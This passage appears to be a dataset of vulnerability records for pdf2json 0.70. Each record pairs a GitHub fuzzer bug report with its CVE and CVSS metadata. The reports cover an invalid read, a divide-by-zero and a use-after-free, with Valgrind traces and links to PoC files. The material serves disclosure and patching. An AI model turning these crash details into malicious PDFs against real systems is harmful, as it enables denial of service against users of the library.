Hi, Our fuzzer found a bug due to an invalid read on the function DCTStream::readHuffSym (the latest commit b671b64 on master - version 0.70). PoC: https://github.com/strongcourage/PoCs/blob/master/pdf2json_b671b64/PoC_ir_DCTStream::readHuffSym Valgrind says: ~~~ valgrind pdf2json $PoC /dev/null ==8920== Memcheck, a memory error detector ==8920== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al. ==8920== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info ==8920== Command: ./pdf2json ./PoC_ir_DCTStream::readHuffSym /dev/null ==8920== Error: PDF file is damaged - attempting to reconstruct xref table... Error (17141): Illegal character <5c> in hex string Error (17152): Illegal character <78> in hex string Error (105): Dictionary key must be a name object Error (154): Dictionary key must be a name object Error (165): Dictionary key must be a name object Error (528): Dictionary key must be a name object Error (530): Dictionary key must be a name object Error (532): Dictionary key must be a name object Error (536): Dictionary key must be a name object Error (539): Dictionary key must be a name object Error (545): Dictionary key must be a name object Error (8015): Command token too long Error (8143): Command token too long Error (8143): Missing 'endstream' ==8920== Invalid read of size 2 ==8920== at 0x436A05: DCTStream::readHuffSym(DCTHuffTable*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==8920== by 0x434C67: DCTStream::readProgressiveDataUnit(DCTHuffTable*, DCTHuffTable*, int*, int*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==8920== by 0x434765: DCTStream::readScan() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==8920== by 0x432C49: DCTStream::reset() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==8920== by 0x40941E: Object::streamReset() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==8920== by 0x48788A: Lexer::Lexer(XRef*, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==8920== by 0x4542CE: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==8920== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==8920== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==8920== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==8920== by 0x42BD48: PDFDoc::displayPages(OutputDev*, int, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==8920== by 0x40269A: main (pdf2json.cc:275) ==8920== Address 0x5b124e2 is 2 bytes after a block of size 32 alloc'd ==8920== at 0x4C2E0EF: operator new(unsigned long) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==8920== by 0x4877C8: Lexer::Lexer(XRef*, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==8920== by 0x4542CE: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==8920== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==8920== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==8920== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==8920== by 0x42BD48: PDFDoc::displayPages(OutputDev*, int, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==8920== by 0x40269A: main (pdf2json.cc:275) ==8920== ==8920== Invalid read of size 2 ==8920== at 0x436A1F: DCTStream::readHuffSym(DCTHuffTable*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==8920== by 0x434C67: DCTStream::readProgressiveDataUnit(DCTHuffTable*, DCTHuffTable*, int*, int*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==8920== by 0x434765: DCTStream::readScan() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==8920== by 0x432C49: DCTStream::reset() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==8920== by 0x40941E: Object::streamReset() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==8920== by 0x48788A: Lexer::Lexer(XRef*, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==8920== by 0x4542CE: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==8920== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==8920== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==8920== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==8920== by 0x42BD48: PDFDoc::displayPages(OutputDev*, int, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==8920== by 0x40269A: main (pdf2json.cc:275) ==8920== Address 0x5b12504 is 28 bytes before a block of size 128 in arena "client" ==8920== Error (1759): Bad Huffman code in DCT stream Error (12887): Bad DCT header Error (12887): Unknown operator '������������������������������������������������������������������������������������������������' ... ==8920== ==8920== HEAP SUMMARY: ==8920== in use at exit: 72,744 bytes in 4 blocks ==8920== total heap usage: 2,947 allocs, 2,943 frees, 693,136 bytes allocated ==8920== ==8920== LEAK SUMMARY: ==8920== definitely lost: 32 bytes in 2 blocks ==8920== indirectly lost: 8 bytes in 1 blocks ==8920== possibly lost: 0 bytes in 0 blocks ==8920== still reachable: 72,704 bytes in 1 blocks ==8920== suppressed: 0 bytes in 0 blocks ==8920== Rerun with --leak-check=full to see details of leaked memory ==8920== ==8920== For counts of detected and suppressed errors, rerun with: -v ==8920== ERROR SUMMARY: 30 errors from 2 contexts (suppressed: 0 from 0) ~~~ Thanks, Manh Dung
Invalid read on DCTStream::readHuffSym
https://api.github.com/repos/flexpaper/pdf2json/issues/33/comments
0
2019-05-28T23:35:23Z
2019-05-28T23:35:23Z
https://github.com/flexpaper/pdf2json/issues/33
449,522,594
33
2,221
CVE-2020-19473
2021-07-21T18:15:08.810
An issue has been found in function DCTStream::decodeImage in PDF2JSON 0.70 that allows attackers to cause a Denial of Service due to an uncaught floating point exception.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/flexpaper/pdf2json/issues/34" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/flexpaper/pdf2json/issues/34" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:flowpaper:pdf2json:0.70:*:*:*:*:*:*:*", "matchCriteriaId": "98C1609A-B5B7-4491-9A9F-ADE54A002903", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "755" ]
755
https://github.com/flexpaper/pdf2json/issues/34
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "flexpaper", "pdf2json" ]
Hi, Our fuzzer found a bug due to a floating point exception on the function DCTStream::decodeImage (the latest commit b671b64 on master - version 0.70). PoC: https://github.com/strongcourage/PoCs/blob/master/pdf2json_b671b64/PoC_fpe_DCTStream::decodeImage Valgrind says: ~~~ valgrind pdf2json $PoC /dev/null ==3166== Memcheck, a memory error detector ==3166== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al. ==3166== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info ==3166== Command: ./pdf2json ./PoC_fpe_DCTStream::decodeImage /dev/null ==3166== Error (13268): Command token too long Error (13372): Illegal character '>' Error: PDF file is damaged - attempting to reconstruct xref table... Error: End of file inside array Error: End of file inside dictionary Error (154): Dictionary key must be a name object Error (165): Dictionary key must be a name object Error (528): Dictionary key must be a name object Error (530): Dictionary key must be a name object Error (532): Dictionary key must be a name object Error (536): Dictionary key must be a name object Error (539): Dictionary key must be a name object Error (545): Dictionary key must be a name object Error (7892): Missing 'endstream' Error (12313): Bad DCT data: missing 00 after ff Error (12887): Bad DCT header ==3166== ==3166== Process terminating with default action of signal 8 (SIGFPE) ==3166== Integer divide by zero at address 0x802EBDD05 ==3166== at 0x43533F: DCTStream::decodeImage() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==3166== by 0x432C6C: DCTStream::reset() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==3166== by 0x40941E: Object::streamReset() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==3166== by 0x48788A: Lexer::Lexer(XRef*, Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==3166== by 0x4542CE: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==3166== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==3166== by 0x42A14A: Page::display(OutputDev*, double, double, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==3166== by 0x42BCBD: PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==3166== by 0x42BD48: PDFDoc::displayPages(OutputDev*, int, int, double, double, int, int, int, int, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==3166== by 0x40269A: main (pdf2json.cc:275) ==3166== ==3166== HEAP SUMMARY: ==3166== in use at exit: 263,639 bytes in 1,768 blocks ==3166== total heap usage: 1,973 allocs, 205 frees, 355,024 bytes allocated ==3166== ==3166== LEAK SUMMARY: ==3166== definitely lost: 16 bytes in 1 blocks ==3166== indirectly lost: 8 bytes in 1 blocks ==3166== possibly lost: 0 bytes in 0 blocks ==3166== still reachable: 263,615 bytes in 1,766 blocks ==3166== suppressed: 0 bytes in 0 blocks ==3166== Rerun with --leak-check=full to see details of leaked memory ==3166== ==3166== For counts of detected and suppressed errors, rerun with: -v ==3166== ERROR SUMMARY: 0 errors from 0 contexts (suppressed: 0 from 0) Floating point exception ~~~ Thanks, Manh Dung
Floating point exception on DCTStream::decodeImage
https://api.github.com/repos/flexpaper/pdf2json/issues/34/comments
0
2019-05-29T07:15:38Z
2019-05-29T07:15:38Z
https://github.com/flexpaper/pdf2json/issues/34
449,636,916
34
2,222
CVE-2020-19474
2021-07-21T18:15:08.847
An issue has been found in function Gfx::doShowText in PDF2JSON 0.70 that allows attackers to cause a Denial of Service due to an Use After Free .
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/flexpaper/pdf2json/issues/35" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/flexpaper/pdf2json/issues/35" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:flowpaper:pdf2json:0.70:*:*:*:*:*:*:*", "matchCriteriaId": "98C1609A-B5B7-4491-9A9F-ADE54A002903", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "416" ]
416
https://github.com/flexpaper/pdf2json/issues/35
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "flexpaper", "pdf2json" ]
Hi, Our fuzzer found a crash due to an Use After Free bug on the function Gfx::doShowText (the latest commit b671b64 on master - version 0.70). PoC: https://github.com/strongcourage/PoCs/blob/master/pdf2json_b671b64/PoC_uaf_Gfx::doShowText Valgrind says: ~~~ valgrind pdf2json $PoC /dev/null ==22556== Memcheck, a memory error detector ==22556== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al. ==22556== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info ==22556== Command: ./pdf2json ./PoC_uaf_Gfx::doShowText /dev/null ==22556== ... ==22556== Invalid read of size 8 ==22556== at 0x462BD5: Gfx::doShowText(GString*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46243E: Gfx::opShowText(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46627C: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x464230: Gfx::opXObject(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== Address 0x5b2b040 is 0 bytes inside a block of size 4,584 free'd ==22556== at 0x4C2F24B: operator delete(void*) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==22556== by 0x46C5E3: Gfx8BitFont::~Gfx8BitFont() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46EEC9: GfxFontDict::~GfxFontDict() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x4534F2: GfxResources::~GfxResources() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x467CC3: Gfx::popResources() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x466309: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x464230: Gfx::opXObject(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== Block was alloc'd at ==22556== at 0x4C2E0EF: operator new(unsigned long) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==22556== by 0x469005: GfxFont::makeFont(XRef*, char*, Ref, Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46ECFB: GfxFontDict::GfxFontDict(XRef*, Ref*, Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x453380: GfxResources::GfxResources(XRef*, Dict*, GfxResources*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x467C63: Gfx::pushResources(Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465DBB: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x464230: Gfx::opXObject(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== ==22556== Invalid read of size 8 ==22556== at 0x4031FB: HtmlString::HtmlString(GfxState*, double, double, XmlFontAccu*) (ImgOutputDev.cc:81) ==22556== by 0x4036BE: HtmlPage::beginString(GfxState*, GString*) (ImgOutputDev.cc:237) ==22556== by 0x462C57: Gfx::doShowText(GString*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46243E: Gfx::opShowText(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46627C: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x464230: Gfx::opXObject(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== Address 0x5b2b0e0 is 160 bytes inside a block of size 4,584 free'd ==22556== at 0x4C2F24B: operator delete(void*) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==22556== by 0x46C5E3: Gfx8BitFont::~Gfx8BitFont() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46EEC9: GfxFontDict::~GfxFontDict() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x4534F2: GfxResources::~GfxResources() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x467CC3: Gfx::popResources() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x466309: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x464230: Gfx::opXObject(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== Block was alloc'd at ==22556== at 0x4C2E0EF: operator new(unsigned long) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==22556== by 0x469005: GfxFont::makeFont(XRef*, char*, Ref, Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46ECFB: GfxFontDict::GfxFontDict(XRef*, Ref*, Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x453380: GfxResources::GfxResources(XRef*, Dict*, GfxResources*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x467C63: Gfx::pushResources(Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465DBB: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x464230: Gfx::opXObject(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== ==22556== Invalid read of size 8 ==22556== at 0x403238: HtmlString::HtmlString(GfxState*, double, double, XmlFontAccu*) (ImgOutputDev.cc:82) ==22556== by 0x4036BE: HtmlPage::beginString(GfxState*, GString*) (ImgOutputDev.cc:237) ==22556== by 0x462C57: Gfx::doShowText(GString*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46243E: Gfx::opShowText(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46627C: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x464230: Gfx::opXObject(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== Address 0x5b2b0e8 is 168 bytes inside a block of size 4,584 free'd ==22556== at 0x4C2F24B: operator delete(void*) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==22556== by 0x46C5E3: Gfx8BitFont::~Gfx8BitFont() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46EEC9: GfxFontDict::~GfxFontDict() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x4534F2: GfxResources::~GfxResources() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x467CC3: Gfx::popResources() (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x466309: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465CE0: Gfx::doForm(Object*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x464230: Gfx::opXObject(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454B1D: Gfx::execOp(Object*, Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454536: Gfx::go(int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x454311: Gfx::display(Object*, int) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x42A59E: Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, Links*, int, Catalog*, int (*)(void*), void*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== Block was alloc'd at ==22556== at 0x4C2E0EF: operator new(unsigned long) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so) ==22556== by 0x469005: GfxFont::makeFont(XRef*, char*, Ref, Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x46ECFB: GfxFontDict::GfxFontDict(XRef*, Ref*, Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x453380: GfxResources::GfxResources(XRef*, Dict*, GfxResources*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x467C63: Gfx::pushResources(Dict*) (in /home/dungnguyen/PoCs/pdf2json_b671b64/pdf2json) ==22556== by 0x465DBB: Gfx::doForm1(Object*, Dict*, double*, double*, int, int, GfxColorSpace*, int, int, int, Function*, GfxColor*) (in 